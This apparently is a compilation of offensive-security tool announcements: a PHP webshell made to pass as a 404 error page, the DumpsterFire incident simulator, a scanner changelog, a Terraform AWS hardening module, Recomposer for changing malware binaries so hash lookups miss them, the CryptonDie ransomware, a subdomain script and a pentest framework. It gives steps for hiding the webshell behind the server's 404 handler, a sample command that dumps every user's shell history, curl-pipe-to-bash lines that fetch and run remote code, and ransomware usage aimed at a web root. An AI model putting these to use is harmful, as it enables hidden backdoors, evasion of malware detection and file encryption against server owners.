
SecurityNotFound - 404 Page Not Found Webshell




Clone me!
Clone or download the project:
git clone https://github.com/CosasDePuma/SecurityNotFound.git SecurityNotFound
cd SecurityNotFound

"Installation"
The src/404.php file should be located on the target server.
That server must have the ability to execute .php files.
Here are some of the most common web root paths where servers host files:
# Windows (Xampp)
C:\Xampp\htdocs\

# Linux
/var/www/html/
Obviously, you and I know that you have legitimate access to that server.

Access Granted!

Now, you can access it through the browser:
https://www.target.com/404.php


You can replace the server's 404 error template with this file so the shell is reachable from any invalid URL.
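On Apache, for example, the 404 template can be pointed at the shell with an ErrorDocument directive in the site configuration or an .htaccess file (assuming 404.php sits in the web root):

ErrorDocument 404 /404.php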
To access the control panel, press the TAB key or locate the hidden password field using your browser's developer tools.


The default password is: cosasdepuma.
You can leave the $passphrase variable in the script as an empty string to directly access the control panel. If that is your intention, you have lost my respect.
To set a custom value, insert your password into the $passphrase variable after applying the MD5 algorithm three consecutive times.
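As a sketch of how to produce that value (assuming each round hashes the hex digest of the previous one, i.e. PHP's md5(md5(md5($pass))) — verify against the script itself):

import hashlib

def triple_md5(password):
    # Apply MD5 three consecutive times, hex-encoding between rounds
    digest = password
    for _ in range(3):
        digest = hashlib.md5(digest.encode()).hexdigest()
    return digest

print(triple_md5("cosasdepuma"))  # paste the result into $passphrase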

Control Panel







DumpsterFire - "Security Incidents In A Box!" A Modular, Menu-Driven, Cross-Platform Tool For Building Customized, Time-Delayed, Distributed Security Events


DumpsterFire Toolset - "Security Incidents In A Box!"
The DumpsterFire Toolset is a modular, menu-driven, cross-platform tool for building repeatable, time-delayed, distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations. Turn paper tabletop exercises into controlled "live fire" range events. Build event sequences ("narratives") to simulate realistic scenarios and generate corresponding network and filesystem artifacts.
The toolset is designed to be dynamically extensible, allowing you to create your own Fires (event modules) to add to the included collection of toolset Fires. Just write your own Fire module and drop it into the FireModules directory. The DumpsterFire toolset will auto-detect your custom Fires at startup and make them available for use.

Author
Joe Gervais (TryCatchHCF)

Why
Red Teams and Blue Teams are typically overextended. What's missing is a way to scale each team's capabilities, providing more effective Red Team activity and more realistic (and helpful) Blue Team / Purple Team exercises. Automation to the rescue! The DumpsterFire Toolset is a cross-platform, menu-driven solution that allows you to easily create custom security incidents by combining modular, chained events into a consistent narrative. Those collections of events (DumpsterFires) can then be executed as time-delayed, automated processes. (They can also be triggered immediately, of course.)
The result? While you're in a meeting or out enjoying life, your DumpsterFire is waiting for its date-time trigger to activate. On a Red Team engagement, while you're busy exploiting that exposed service on a forgotten B2B server, your cloned & time-synchronized DumpsterFires are busy lighting up the target organization's SIEM on a far-away subnet, distracting their response team. Blue Teamers can turn tabletop paper exercises into "live fire" range events, with controlled, pre-approved DumpsterFire event chains to trigger sensors and alerts, and train their analysts in their actual operational environment. Purple Team operations can now execute methodical, repeatable event chains to consistently map out their sensor and alerting posture. You can generate novel scenarios to test and train your teams, getting ahead of the threat space to be prepared for security contingencies.
Ever wondered how your Blue Team would respond to Mirai bot activity on your internal network? Now you can find out! (Don't worry, the Mirai bot Fire module doesn't pivot, but it does use the same usernames & passwords to brute-force telnet sessions across the target network.)
Don’t have a Red Team but wish you had an easy way to run controlled, repeatable, customized drills against all of your SOC shift teams? Done!
Wish you could support a Red Team engagement against a remote team that’s 7 timezones away, without waking up at 3:00am? Hit that snooze button!
Ever wanted to simultaneously rickroll all of your opponents’ systems during your annual cyberwarfare exercise? "Never gonna let you down!"
See sample DumpsterFires below. And of course the Shenanigans section.

Tutorial
See my CactusCon 2017 slides (included in project). The slides are written to stand on their own, providing background, approaches, specific use cases, and more. They'll put everything in context, and also won't put you to sleep. Unless they do put you to sleep, in which case you probably needed some rest anyway, so really we all come out ahead here.

Accountability
DumpsterFire creates a date-time stamped event log so that Red and Blue Teams can coordinate and track events, correlating them to what was detected (or not detected) by your sensors, which alerts did or did not trigger, etc. It also allows teams to confirm which events were part of your operation / exercise, keeping everyone out of trouble. All date-time tracking is performed in UTC, so your global operations can be easily correlated without worrying about conversions between timezones and international date lines.
The auto-generated date-time stamped event logs also provide an effortless value add to your engagements. Generate a collection of DumpsterFires for your client engagements, tailored to their attack surfaces. At the end of your operations you can hand over the logs as a bonus Purple Team deliverable to your client for post-engagement analysis.


Overview
The DumpsterFire toolset workflow is designed to be user-friendly and robust. Everything can be done from within the menu-driven dumpsterFireFactory.py script. Launch the script and the tool will guide you as you go. You can start by browsing the existing Fire modules and saved DumpsterFires. When you're ready to create your own DumpsterFires, the tool will lead you through the workflow to get the job done. Finally it will be time to ignite your DumpsterFire. After selecting the DumpsterFire of your choice, you'll review the DumpsterFire's Fire modules and settings. If everything looks good, light it up!
When you're building a DumpsterFire, after you've chosen all of the Fire modules you wish to include, the tool will loop through the list of Fires. If a Fire has options for custom settings, the tool will call that Fire's Configure() method to present you with prompts for its settings (e.g. a target network's IP address).
Once all of the Fires have been configured, you'll then be given the option to assign individual time delays to your Fires. This allows the DumpsterFire to better mimic real operations when executing its chain of events. For example, the first Fire may visit various hacking Websites, the next Fire then downloads a few common hacking tools before launching the third Fire which starts scanning the local network. If this all happened within seconds of each other, no SOC analyst is going to believe it was a human. By adding several minutes or even hours between those events, you create a more realistic chain of events.
After all of the Fires have been configured and optional individual Fire delays assigned, you'll be asked to name your DumpsterFire. Do not use spaces or odd special characters; just stick to letters, numbers, underscores, and hyphens.
Voila! You have now created your first DumpsterFire. Time to light one up!
When you're ready to ignite a DumpsterFire, the tool will first show you the DumpsterFire's settings. If everything looks good, you'll be asked if you want to assign a date-time delay before igniting. All date-time processing is done in UTC to ensure consistent execution regardless of your DumpsterFire's location of execution. Otherwise you can decline the date-time delay and execution will begin immediately after you give final confirmation.
As the DumpsterFire executes, you'll be given regular date-time stamped feedback on each Fire's status and critical events. This not only helps you track progress, but also provides a chronological record of your DumpsterFire's activities - critical in coordinating and deconflicting your events from the general background noise that floods every SOC. You can also hand over the chronological record to your external clients after your operations are complete, as a value-added record of your activities that they can use to review their sensor and alert settings. All with no extra effort on your part.

Shenanigans
April 1st happens! So do cyber wargames or your best friend's birthday. Some circumstances call for a little extra something. Finally infiltrate your opponent's perimeter in that net wars competition? Celebrate with Shenanigans while locking in your victory! Best friend leave their screen unlocked on game night? Sharing is caring! DumpsterFire's Shenanigans let you add some flavor to your operation.
Want to open the system's default browser and stream all of that Rick Astley awesomeness? After setting their system volume to maximum? How about opening any URL you choose? Or setting the system's shell aliases to pretend the filesystem is corrupted?


Files & Directories
dumpsterFireFactory.py - Menu-driven tool for creating, configuring, scheduling, and executing DumpsterFires
FireModules/ - Directory that contains subdirectories of Fires, each subdirectory is a specific Category of Fires to keep your Fire modules organized. Fires are added to a DumpsterFire to create a chain of events and actions.
DumpsterFires/ - Directory containing your collection of DumpsterFires
igniteDumpsterFire.py - Headless script, invoked at the command line with the filename of the DumpsterFire you wish to execute. Useful for igniting distributed DumpsterFires (see the example after this list).
testFireModule.py - Utility script for unit testing the class methods of your custom Fire modules, without the hassle of running through the entire DumpsterFire Factory process to debug. Also useful for running a single Fire to check your settings. testFireModule.py will prompt you for configuration settings where applicable.
__init__.py files - Required to make Python treat directories as containing Python packages, allows DumpsterFire toolset to find and load Fire modules.
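For example, a distributed node could ignite a saved DumpsterFire headlessly like this (the DumpsterFire filename is hypothetical):

$ ./igniteDumpsterFire.py DumpsterFires/my_distraction_narrative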

Requirements
Python 2.7.x

Run DumpsterFire Factory
$ ./dumpsterFireFactory.py

Creating a DumpsterFire:
The menu-driven DumpsterFire Factory script guides you through each step, with context-appropriate help along the way.


Sample DumpsterFires
In our first example, we have a DumpsterFire that could be either a SOC drill or a Red Team distraction. The DumpsterFire first does a Google search for hacking tools. The next Fire opens Web sessions to various hacking websites, a following Fire downloads some common hacking tools, then a port scan targets the subnetwork, followed by brute-force login attempts against a single host via Telnet. The final Fire runs a series of Linux commands. Note that between each Fire, the creator of this DumpsterFire has inserted some time delays. This makes the flow of events appear more realistic.


In the next example, Purple Teamers have created a DumpsterFire to help analyze and validate their sensor and alerting configurations. This DumpsterFire runs a choreographed series of port scans, each targeting different collections of ports & services, with varying probe rates as well. They've inserted a 5 minute delay between each scanning Fire to simplify isolating the traffic associated with each scanning Fire. When they run this DumpsterFire, they'll also see date-timestamps at the beginning of each Fire to help them deconflict the Fire's network activity vs. other network events.


Customizing Your Dumpster Fires
DumpsterFire's modular design gives you flexibility to create any number of event-chain narratives. Fire modules that have configurable settings allow you to set target networks or systems, etc. There are a few Fire modules, however, that give you immediate flexibility to greatly expand your DumpsterFire event sequences.
Without creating any new FireModule classes, you can use these existing "custom" Fire modules to leverage and extend your DumpsterFires:
  • FireModules/Websurfing/custom_url.py
  • FireModules/FileDownloads/download_custom_url.py
  • FireModules/OSCommand/os_linux_unix_command.py
  • FireModules/OSCommand/os_win_cmd_command.py
  • FireModules/OSCommand/os_win_powershell_script.py
  • FireModules/OSCommand/os_osx_applescript_command.py
You can add any number of these to your DumpsterFire, each with its own custom actions. For example, you could chain together a dozen 'custom_url.py' Fire modules to build a complete, tailored browsing narrative. You could then have various 'OSCommand/' Fire instances that execute system commands to further reinforce your desired narrative of events. The 'OSCommand/' Fires in particular give you incredible flexibility. Each individual Fire in your DumpsterFire event chain takes any shell commands that are appropriate for the host's OS:
Example: Linux/Unix (& OSX terminal)
find /home -name '*.bash_history' -exec cat {} \; ; echo "Never gonna give you up" > rickroll.txt ; wall rickroll.txt

Write Your Own Custom Fire Modules
DumpsterFire is ready to use out of the box, but its real value is in how easily you can extend DumpsterFire's scenario toolchest by creating your own custom Fire modules. By creating and tailoring Fire modules to match your specific needs, you can quickly expand the types of DumpsterFire scenarios you can build and execute. Simply write your new Fire module and drop it into an existing directory under FireModules/ and the DumpsterFire toolset will automatically load it at runtime and make it available.
Want to keep your custom Fire modules completely separate in their own Category? Easy! Just create a new directory under FireModules/ and the DumpsterFire toolset will auto-detect and make it available as a new Category of Fires.
NOTE: Be sure your new directory has an empty file named __init__.py, otherwise the Python package manager won't be able to find it and DumpsterFire won't see it.


Your Fire module inherits from a class called FireModule. As a starting point, you can copy an existing Fire module. Be sure to change the filename and all classname references in the file to match your new Fire. (Update the Category path references in the class's constructor methods too, if needed.)
Required Class Methods:
Configure() - Prompts user for input, populates FireModule’s parameters
Description() - Return a string containing a description of the FireModule
GetParameters() - Returns a single string of Fire's parameters
SetParameters( string ) - Takes a single string & populates Fire's members
ActivateLogging( boolean ) - Sets flag for Fire to generate a log of its activities (great for review) NOTE: For initial release, logging to stdout is always on.
Ignite() - Executes Fire's actions
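As a hedged sketch (not code from the project), a minimal custom Fire might look like the following. The base-class import path and member names are assumptions; copy an existing module from FireModules/ for the exact boilerplate:

# myCustomFire.py - hypothetical skeleton, written for Python 2.7
import os
from FireModules.fire_module_base_class import *   # assumed base-class location

class myCustomFire( FireModule ):
    def __init__( self ):
        self.commandLine = ""

    def Description( self ):
        return "Runs a single custom shell command (illustrative only)"

    def Configure( self ):
        # Prompt the user and populate this Fire's parameters
        self.commandLine = raw_input( "Enter the shell command to run: " )

    def GetParameters( self ):
        return self.commandLine

    def SetParameters( self, parameters ):
        self.commandLine = parameters

    def ActivateLogging( self, logFlag ):
        # Initial release always logs to stdout; flag kept for interface parity
        self.loggingOn = logFlag

    def Ignite( self ):
        os.system( self.commandLine )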

Utility Scripts
Testing Python classes can be annoying, especially when you want to unit test each of the class's methods, forcing you to slog through all the application's use cases to make sure each class method is executed in proper order. Bleh. So I've written and included a script that will properly invoke each method of your new FireModule-derived classes, enabling you to quickly churn-and-burn your way through debugging. You're welcome. :-) Also a great way to run a Fire by itself to test your settings, see what it does, etc.
At the command line, give the testFireModule.py script the relative filepath to your custom Fire module. The test script will call each of the required FireModule methods for you, in proper sequence (getting configuration prior to saving, etc.). The test script doesn't use exception handling, because Python only gives you useful errors (like pointing out that missing double-quote) when it crashes. Crash and burn your way to a successful custom Fire!
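For example (hypothetical module path):

$ ./testFireModule.py FireModules/MyCategory/myCustomFire.py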


Syhunt Community 6.7 - Web And Mobile Application Scanner


Syhunt Community is a web and now mobile application security scanner. Syhunt is able to scan any kind of application source code for potential security vulnerabilities, pinpointing the exact lines of the code that need to be patched. Or you can simply enter a start URL and get detailed vulnerability information - Syhunt also comprises a deep crawler able to fully map a website's structure and an automated injector able to adapt, mutate, analyze and test the web application's response to thousands of different web attacks.

CHANGELOG VERSION 6.7 (SEPTEMBER 17, 2019)
* Added SAST support and checks for mobile (iOS and Android) apps. This includes support for the programming languages Objective-C, C, C++ and Swift.
* Added many new and improved SAST checks for Java.
* Improved code vulnerability detection accuracy and vulnerable line detection precision.
* Improved insecure randomness checks (additional checks) in Syhunt Code.
* Improved multi-language source code parsing.
* Improved automated web form login (alternative schemes) in Syhunt Dynamic.
* Improved spidering of heavily dynamically generated web stores.
* Minor optimizations for Wordpress-based websites in Syhunt Dynamic.
* Additional entry point coverage and input filtering/validation analysis in Syhunt Code.
* Added the ability to ignore specific vulnerabilities in the Site Preferences and Code Scanner Preferences screens.
* Improved session status and icons in session manager.
* Fixed a few bugs and false positives:
- GIT for Windows 64-bit not being detected by Syhunt Code.
- Improved hardcoded resource checks (eliminating some common false positives) in Syhunt Code.
- Improved insecure salting checks (fixed two false positive cases) in Syhunt Code.
- Fixed an overly broad path rejection rule in the spider.
- Made user check preferences override hunt method check preferences in both Syhunt Dynamic and Syhunt Code.
- Fixed an error message involving the options table when trying to add a target to the Dynamic Target list.


Terraform AWS Secure Baseline - Terraform Module To Set Up Your AWS Account With The Secure Baseline Configuration Based On CIS Amazon Web Services Foundations


Terraform Module Registry
A terraform module to set up your AWS account with a reasonably secure configuration baseline. Most configurations are based on CIS Amazon Web Services Foundations v1.2.0.
See Benchmark Compliance to check which items in CIS benchmark are covered.
Starting from v0.10.0, this module requires Terraform v0.12 or later. Please use v0.9.0 if you need to use Terraform v0.11 or earlier.

Features

Identity and Access Management
  • Set up IAM Password Policy.
  • Create separated IAM roles for defining privileges and assigning them to entities such as IAM users and groups.
  • Create an IAM role for contacting AWS support for incident handling.
  • Enable AWS Config rules to audit root account status.

Logging & Monitoring
  • Enable CloudTrail in all regions and deliver events to CloudWatch Logs.
  • CloudTrail logs are encrypted using AWS Key Management Service.
  • All logs are stored in the S3 bucket with access logging enabled.
  • Logs are automatically archived into Amazon Glacier after the given period (defaults to 90 days).
  • Set up CloudWatch alarms to notify you when critical changes happen in your AWS account.
  • Enable AWS Config in all regions to automatically take configuration snapshots.
  • Enable SecurityHub and subscribe to the CIS benchmark standard.

Networking
  • Remove all rules associated with default route tables, default network ACLs and default security groups in the default VPC in all regions.
  • Enable AWS Config rules to audit unrestricted common ports in Security Group rules.
  • Enable VPC Flow Logs with the default VPC in all regions.
  • Enable GuardDuty in all regions.

Usage
data "aws_caller_identity" "current" {}
data "aws_region" "current" {}

module "secure_baseline" {
source = "nozaq/secure-baseline/aws"

audit_log_bucket_name = "YOUR_BUCKET_NAME"
aws_account_id = data.aws_caller_identity.current.account_id
region = data.aws_region.current.name
support_iam_role_principal_arn = "YOUR_IAM_USER"

providers = {
aws = aws
aws.ap-northeast-1 = aws.ap-northeast-1
aws.ap-northeast-2 = aws.ap-northeast-2
aws.ap-south-1 = aws.ap-south-1
aws.ap-southeast-1 = aws.ap-southeast-1
aws.ap-southeast-2 = aws.ap-southeast-2
aws.ca-central-1 = aws.ca-central-1
aws.eu-central-1 = aws.eu-central-1
aws.eu-north-1 = aws.eu-north-1
aws.eu-west-1 = aws.eu-west-1
aws.eu-west-2 = aws.eu-west-2
aws.eu-west-3 = aws.eu-west-3
aws.sa-east-1 = aws.sa-east-1
aws.us-east-1 = aws.us-east-1
aws.us-east-2 = aws.us-east-2
aws.us-west-1 = aws.us-west-1
aws.us-west-2 = aws.us-west-2
}
}
Check the example to understand how these providers are defined. Note that you need to define a provider for each AWS region and pass them to the module. Currently this is the recommended way to handle multiple regions in one module. Detailed information can be found at Providers within Modules - Terraform Docs.
A new S3 bucket to store audit logs is automatically created by default, though an external S3 bucket can be specified instead. This is useful when you already have a centralized S3 bucket to store all logs. Please see the external-bucket example for more detail.

Managing multiple accounts in AWS Organization
When you have multiple AWS accounts in your AWS Organization, the secure-baseline module configures a separate environment for each AWS account. You can change this behavior to centrally manage security information and audit logs from all accounts in one master account. Check the organization example for more detail.

Submodules
This module is composed of several submodules, each of which can be used independently. Modules in Package Sub-directories - Terraform describes how to source a submodule.

Inputs
| Name | Description | Type | Default | Required |
|------|-------------|------|---------|----------|
| account_type | The type of the AWS account. The possible values are individual, master and member. Specify master or member to set up centralized logging for multiple accounts in an AWS Organization. Use individual otherwise. | string | "individual" | no |
| alarm_namespace | The namespace in which all alarms are set up. | string | "CISBenchmark" | no |
| alarm_sns_topic_name | The name of the SNS Topic which will be notified when any alarm is performed. | string | "CISAlarm" | no |
| allow_users_to_change_password | Whether to allow users to change their own password. | string | "true" | no |
| audit_log_bucket_force_destroy | A boolean that indicates all objects should be deleted from the audit log bucket so that the bucket can be destroyed without error. These objects are not recoverable. | string | "false" | no |
| audit_log_bucket_name | The name of the S3 bucket to store various audit logs. | string | n/a | yes |
| audit_log_lifecycle_glacier_transition_days | The number of days after log creation when the log file is archived into Glacier. | string | "90" | no |
| aws_account_id | The AWS Account ID number of the account. | string | n/a | yes |
| cloudtrail_cloudwatch_logs_group_name | The name of the CloudWatch Logs group to which CloudTrail events are delivered. | string | "cloudtrail-multi-region" | no |
| cloudtrail_iam_role_name | The name of the IAM Role to be used by CloudTrail to deliver logs to the CloudWatch Logs group. | string | "CloudTrail-CloudWatch-Delivery-Role" | no |
| cloudtrail_iam_role_policy_name | The name of the IAM Role Policy to be used by CloudTrail to deliver logs to the CloudWatch Logs group. | string | "CloudTrail-CloudWatch-Delivery-Policy" | no |
| cloudtrail_key_deletion_window_in_days | Duration in days after which the key is deleted after destruction of the resource; must be between 7 and 30 days. | string | "10" | no |
| cloudtrail_name | The name of the trail. | string | "cloudtrail-multi-region" | no |
| cloudtrail_s3_key_prefix | The prefix used when CloudTrail delivers events to the S3 bucket. | string | "cloudtrail" | no |
| cloudwatch_logs_retention_in_days | Number of days to retain logs for. CIS recommends 365 days. Possible values are: 0, 1, 3, 5, 7, 14, 30, 60, 90, 120, 150, 180, 365, 400, 545, 731, 1827, and 3653. Set to 0 to keep logs indefinitely. | string | "365" | no |
| config_aggregator_name | The name of the organizational AWS Config Configuration Aggregator. | string | "organization-aggregator" | no |
| config_aggregator_name_prefix | The prefix of the name for the IAM role attached to the organizational AWS Config Configuration Aggregator. | string | "config-for-organization-role" | no |
| config_delivery_frequency | The frequency with which AWS Config sends a snapshot into the S3 bucket. | string | "One_Hour" | no |
| config_iam_role_name | The name of the IAM Role which AWS Config will use. | string | "Config-Recorder" | no |
| config_iam_role_policy_name | The name of the IAM Role Policy which AWS Config will use. | string | "Config-Recorder-Policy" | no |
| config_s3_bucket_key_prefix | The prefix used when writing AWS Config snapshots into the S3 bucket. | string | "config" | no |
| config_sns_topic_name | The name of the SNS Topic to be used to notify configuration changes. | string | "ConfigChanges" | no |
| guardduty_disable_email_notification | Boolean whether an email notification is sent to the accounts. | string | "false" | no |
| guardduty_finding_publishing_frequency | Specifies the frequency of notifications sent for subsequent finding occurrences. | string | "SIX_HOURS" | no |
| guardduty_invitation_message | Message for invitation. | string | "This is an automatic invitation message from guardduty-baseline module." | no |
| manager_iam_role_name | The name of the IAM Manager role. | string | "IAM-Manager" | no |
| manager_iam_role_policy_name | The name of the IAM Manager role policy. | string | "IAM-Manager-Policy" | no |
| master_account_id | The ID of the master AWS account to which the current AWS account is associated. Required if account_type is member. | string | "" | no |
| master_iam_role_name | The name of the IAM Master role. | string | "IAM-Master" | no |
| master_iam_role_policy_name | The name of the IAM Master role policy. | string | "IAM-Master-Policy" | no |
| max_password_age | The number of days that a user password is valid. | string | "90" | no |
| member_accounts | A list of IDs and emails of AWS accounts which are associated as member accounts. | object | [] | no |
| minimum_password_length | Minimum length to require for user passwords. | string | "14" | no |
| password_reuse_prevention | The number of previous passwords that users are prevented from reusing. | string | "24" | no |
| region | The AWS region in which global resources are set up. | string | n/a | yes |
| require_lowercase_characters | Whether to require lowercase characters for user passwords. | string | "true" | no |
| require_numbers | Whether to require numbers for user passwords. | string | "true" | no |
| require_symbols | Whether to require symbols for user passwords. | string | "true" | no |
| require_uppercase_characters | Whether to require uppercase characters for user passwords. | string | "true" | no |
| support_iam_role_name | The name of the support role. | string | "IAM-Support" | no |
| support_iam_role_policy_name | The name of the support role policy. | string | "IAM-Support-Role" | no |
| support_iam_role_principal_arn | The ARN of the IAM principal element by which the support role could be assumed. | string | n/a | yes |
| tags | Specifies object tags key and value. This applies to all resources created by this module. | map | { "Terraform": true } | no |
| use_external_audit_log_bucket | A boolean that indicates whether the specified audit log bucket already exists. A new S3 bucket is created if it is set to false. | string | "false" | no |
| vpc_iam_role_name | The name of the IAM Role which VPC Flow Logs will use. | string | "VPC-Flow-Logs-Publisher" | no |
| vpc_iam_role_policy_name | The name of the IAM Role Policy which VPC Flow Logs will use. | string | "VPC-Flow-Logs-Publish-Policy" | no |
| vpc_log_group_name | The name of the CloudWatch Logs group to which VPC Flow Logs are delivered. | string | "default-vpc-flow-logs" | no |
| vpc_log_retention_in_days | Number of days to retain logs for. CIS recommends 365 days. Possible values are: 0, 1, 3, 5, 7, 14, 30, 60, 90, 120, 150, 180, 365, 400, 545, 731, 1827, and 3653. Set to 0 to keep logs indefinitely. | string | "365" | no |

Outputs
| Name | Description |
|------|-------------|
| alarm_sns_topic | The SNS topic to which CloudWatch Alarms will be sent. |
| audit_bucket | The S3 bucket used for storing audit logs. |
| cloudtrail | The trail for recording events in all regions. |
| cloudtrail_kms_key | The KMS key used for encrypting CloudTrail events. |
| cloudtrail_log_delivery_iam_role | The IAM role used for delivering CloudTrail events to CloudWatch Logs. |
| cloudtrail_log_group | The CloudWatch Logs log group which stores CloudTrail events. |
| config_configuration_recorder | The configuration recorder in each region. |
| config_iam_role | The IAM role used for delivering AWS Config records to CloudWatch Logs. |
| config_sns_topic | The SNS topic that AWS Config delivers notifications to. |
| default_network_acl | The default network ACL. |
| default_route_table | The default route table. |
| default_security_group | The ID of the default security group. |
| default_vpc | The default VPC. |
| guardduty_detector | The GuardDuty detector in each region. |
| manager_iam_role | The IAM role used for the manager user. |
| master_iam_role | The IAM role used for the master user. |
| support_iam_role | The IAM role used for the support user. |
| vpc_flow_logs_group | The CloudWatch Logs log group which stores VPC Flow Logs in each region. |
| vpc_flow_logs_iam_role | The IAM role used for delivering VPC Flow Logs to CloudWatch Logs. |


Recomposer - Randomly Changes Win32/64 PE Files For 'Safer' Uploading To Malware And Sandbox Sites


Ever have that not-so-safe feeling uploading your malware binaries to VirusTotal or other AV sites, because anyone can look up binaries by their hashes? (Example: https://github.com/mubix/vt-notify)
Feel somewhat safer with Recomposer!*
Recomposer will take your binary and randomly do the following:
  • Change the file name
  • Change the section names
  • Change the section flags
  • Inject a random number of NOPs (five different types) into each available code cave over 20 bytes in length (see the sketch after this list)
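As a rough illustration of the section-renaming step only (not Recomposer's actual code), the third-party pefile library can rewrite PE section headers; the filenames and new section names here are hypothetical:

import pefile  # third-party: pip install pefile

pe = pefile.PE("input.exe")
for i, section in enumerate(pe.sections):
    # Section names are at most 8 bytes, NUL-padded
    section.Name = (".rnd%d" % i).encode().ljust(8, b"\x00")
pe.write(filename="output.exe")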

By the way, your file will still execute, so upload away!*
Supports win32/64 PE Files!!
Two modes:
  • Manual: Works like a PE Editor, change section names and flags
  • Auto: Randomly changes the binary
Tested by creating 11200 samples from one binary. Results:
  • No hash collisions
  • ssdeep matching percentage to the original file ranged from 77% to 94%

Usage:

Auto Mode:
./recomposer.py -f live.sysinternals.com/Tcpview.exe -a
Old file name: live.sysinternals.com/Tcpview.exe
New file name: zYmycO4NO2LYW.exe
[*] Checking if binary is supported
[*] Gathering file info
1 Section: .text | SectionFlags: 0x60000020
2 Section: .rdata | SectionFlags: 0x40000040
3 Section: .data | SectionFlags: 0xc0000040
4 Section: .rsrc | SectionFlags: 0x40000040
[*] Changing Section .text Name
[*] Changing Section .rdata Name
[*] Changing Section .data Flags
[*] Changing Section .data Name
[*] Changing Section .rsrc Name
Updated Binary:
updatedfile/zYmycO4NO2LYW.exe
[*] Checking if binary is supported
[*] Gathering file info
1 Section: .mhz | SectionFlags: 0x60000020
2 Section: .p1k | SectionFlags: 0x40000040
3 Section: .FSr0U | SectionFlags: 0xd0000443
4 Section: .q2X | SectionFlags: 0x40000040
Writing to log_recomposer.txt
You might see this warning:
[!] Warning, .text section hash is not changed!
[!] No caves available for nop injection.
This means the .text section hash will be the same as the original file's and will be searchable (on the web) once Google indexes the VT results (if you upload the file, of course). If this happens, packing the recomposed file with UPX should take care of the problem (unless the file is already UPX-packed).
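For example, using UPX's maximum-compression flag on the file produced in the run above:

upx -9 updatedfile/zYmycO4NO2LYW.exe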
After recomposer completes, your file will be in the updatedfile directory. Feel free to upload it to your favorite malware sandbox service!

Manual Mode:
A simple PE Editor:
./recomposer.py -f live.sysinternals.com/Tcpview.exe -m
[*] Checking if binary is supported
[*] Gathering file info
[?] What sections would you like to change:
1 Section: .text | SectionFlags: 0x60000020
2 Section: .rdata | SectionFlags: 0x40000040
3 Section: .data | SectionFlags: 0xc0000040
4 Section: .rsrc | SectionFlags: 0x40000040
Section number:1
[-] You picked the .text section.
[?] Would you like to (A) change the section name or (B) the section flags? b
[-] You picked: b
=========================
[*] Current attributes:
.text | 0x60000020
[-] IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_EXECUTE
[-] IMAGE_SCN_CNT_CODE
=========================
[*] Commands 'zero' out the flags, 'help', 'write', or ('exit', 'quit', 'q', 'done')
[*] Use 'write' to commit your changes or 'clear' to start over.
[?] Enter an attribute to add or type 'help' or 'exit':
[...]
Just follow the menu and your results will be in the updatedfile directory as change.filename.exe, or whatever output name you chose with the -o flag.
If you are confused about where your files are, just look at log_recomposer.txt for the locations and hashes of changed files:
filename|filename_hash|changedfile|changedfile_hash

psinfo.exe|ae1554f2c1b1454a91c5610747603824|updatedfile/8dV5.exe|791ff4d4b2010accebc718afda58f83a
psexec.exe|d0df366711c8b296680002840336b6fd|updatedfile/udi6ieIVFi.exe|6fafa108d697a46a271a918436e60cd5
live.sysinternals.com/Tcpview.exe|9aa5a93712c584acdcaa7eef9d25ef4d|updatedfile/zYmycO4NO2LYW.exe|fd984b833443c457668a480a37cf9904
live.sysinternals.com/Tcpview.exe|9aa5a93712c584acdcaa7eef9d25ef4d|updatedfile/change.Tcpview.exe|c43eeec089a3e4f9e6fd0218a27ca4c2
* Recomposer does not stop malware from notifying its owner that the binary is running outside of an expected environment (i.e., your environment). But if you don't care, go for it!


CryptonDie - A Ransomware Developed For Study Purposes


CryptonDie is a ransomware developed for study purposes.

Options
    --key       key used to encrypt and decrypt files; default is a random string (recommended)
    --dir       home directory for the attack; default is /
    --encrypt   encrypt all files
    --decrypt   decrypt all files
    --verbose   activate verbose mode; default is False

Example:
python3 cryptondie.py --web-service http://127.0.0.1:5000 --dir /var/www/ --encrypt --verbose

Web service endpoints
GET   - /targets              - list all targets (returns in JSON format)
GET   - /targets/<target_id>  - list one target by id (returns in JSON format)
POST  - /target/<target_id>   - create new target

How to run this shit?

Cloning the repository
git clone https://github.com/zer0dx/cryptondie

Install requirements
pip3 install -r requirements.txt

Running the web service
cd cryptondie/discovery
python3 service_discovery.py
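Once the discovery service is up, the endpoints above can be exercised from Python; a minimal sketch, assuming the service listens on the URL from the example:

import requests

# List all registered targets from the local web service
response = requests.get("http://127.0.0.1:5000/targets")
print(response.json())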

Which encryption is implemented?
Advanced Encryption Standard  

Contact
[+] Telegram:   @zer0dx
[+] Github:     https://github.com/zer0dx
[+] Twitter:    https://twitter.com/zer0dxx
[+] Blog:       https://zer0dx.github.io
chaos is order yet undeciphered.


Sub.Sh - Online Subdomain Detect Script

Online Subdomain Detect Script.

USAGE 

Script
bash sub.sh webscantest.com 
./sub.sh webscantest.com


Curl
curl -s -L https://raw.githubusercontent.com/cihanmehmet/sub.sh/master/sub.sh | bash -s webscantest.com


Subdomain Alive Check
bash sub_alive.sh bing.com
curl -s -L https://raw.githubusercontent.com/cihanmehmet/sub.sh/master/sub_alive.sh | bash -s bing.com
‼️ fping required


Nmap -sn (no port scan) live IP detection script

fping -f ip.txt

Usage: bash nmap_sn.sh ip.txt


#!/bin/bash

# Extract live IPs from an Nmap ping scan and save them to result_<inputfile>
nmap -sn -iL "$1" | grep "Nmap scan report for" | grep -Eo "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" | sort -u | tee "result_$1"

echo "Detected IPs: $(wc -l < "result_$1") => result_$1 saved"
echo "File Location : $(pwd)/result_$1"



Lockdoor Framework - A Penetration Testing Framework With Cyber Security Resources


Lockdoor Framework : A Penetration Testing Framework With Cyber Security Resources.


09/2019 : 1.0Beta
  • Information Gathering Tools (21)
  • Web Hacking Tools (15)
  • Reverse Engineering Tools (15)
  • Exploitation Tools (6)
  • Pentesting & Security Assessment Findings Report Templates (6)
  • Password Attack Tools (4)
  • Shell Tools + Blackarch's Webshells Collection (4)
  • Walk Throughs & Pentest Processing Helpers (3)
  • Encryption/Decryption Tools (2)
  • Social Engineering tools (1)
  • All the privilege escalation scripts and exploits you need
  • Working on Kali, Ubuntu, Arch, Fedora, openSUSE and Windows (Cygwin)



09/2019 : 0.6
  • Information Gathering tools (13)
  • Web Hacking Tools (9)
